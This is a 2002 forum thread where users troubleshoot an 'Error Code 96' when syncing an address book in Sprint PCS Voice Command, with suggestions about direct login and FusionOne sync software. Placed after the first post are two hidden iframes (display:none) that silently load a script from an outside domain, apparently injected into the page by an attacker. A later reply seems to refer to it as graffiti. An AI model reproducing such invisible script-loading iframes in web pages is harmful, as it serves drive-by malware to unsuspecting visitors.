Poll: What results have you had trying to Synchronize your addressbook in Voice Command?

+ Reply to Thread

Question SPCS Voice Command Synchronize Feature Problems

Has anyone else had zero success utilizing this feature? I have not been able to get it to work yet.

I click on "Click to Synchronize", a new window pops up, and I get the following error message within it:

" Error:
    The username you entered is not valid for this account.
    Error Code : 96 "

The thing is, I haven't entered any username at all. I merely log into my account, and then navigate to the address book within the Voice Command site.

I have contacted Sprint several times regarding this, and still have an open ticket. The last time I called, I was informed that I am not the only one encountering this error, and that they are working on it.

Being suspicious of anything the dolts from tech support tell me, I wanted to ask if anyone else has had this problem.

Thanks in advance.

Craig

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by csherman; 02-19-2002 at 09:57 PM.
    I thought grafitti was illegal?

It works for me, intermittently, althought I've never seen the error you are getting. The site is down probably 60% of the time I try to go to it.

One thought--instead of logging into the main page and navigating to the voice command, have you tried logging directly into the voice command site? Maybe that will work better for you. I always go direct to the Sprint Voice Command site. See if that works better for you.

Administrator

Arrow

i had 100 % success when i first started using it.

i aggree with the last post, go to the talk.sprintpcs.com site and log in there. i even have the fusion software sync automatically with my palm desktop. great results for me!

Well, this sucks!

I hate having features of gadgets that won't work! How the hell am I supposed to impress strangers now???

Craig

Craig, use the fusion one download. Its a painless sync everytime.

MJ,

I know there is a download. Are you saying I should do it directly through the FusionOne site? Then what?

I would really appreciate your input.

Craig

No its not from the fusion one site but on the Sprint PCS voice command site. I think Marc posted a link here or somewhere recently. I think their site said something like get your software here. I was unaware it was fusion one. Once you have it though, Craig, it'll be smooth sailing. Don't know that I helped. Marc, what was that link again?

MJ,

That's the problem. I can't get to the site. I click "Synchronize", and I only get the above menitoned error message....

Craig

OK, sorry about that Craig. I'm eye to eye with you now. I'm on the voice command page now and when I click sync now, I receive a warm welcome from fusion one and it begins syncing. Wish I could be of more help buddy. This probably has nothing to do with it, but could it be related to cookies or do you have another fusion one account already?

Yeah, I thought of that, contacted FusionOne, etc. Nothing works....

Craig

Okay, I may be finally making some progress here by going through fusionone.com, however the SPH-I300 isn't listed as a compatible device!! Any ideas here?

Craig

Why should the individual device matter as long as Palm OS is recognized somewhere? The I300 isn't recognized for desktop 4.0.1 either. You might just try your luck Craig.

It asks for the device. Under Web enabled phone, there are several Samsung's but not the i300 and under Palm Device, there is no mention of it. Perhaps I should choose the Palm VII?

Craig

Why not Craig! Whats the worst that can happen?:p

I'm having similar issues, does anyone have a link to the FusionONe software?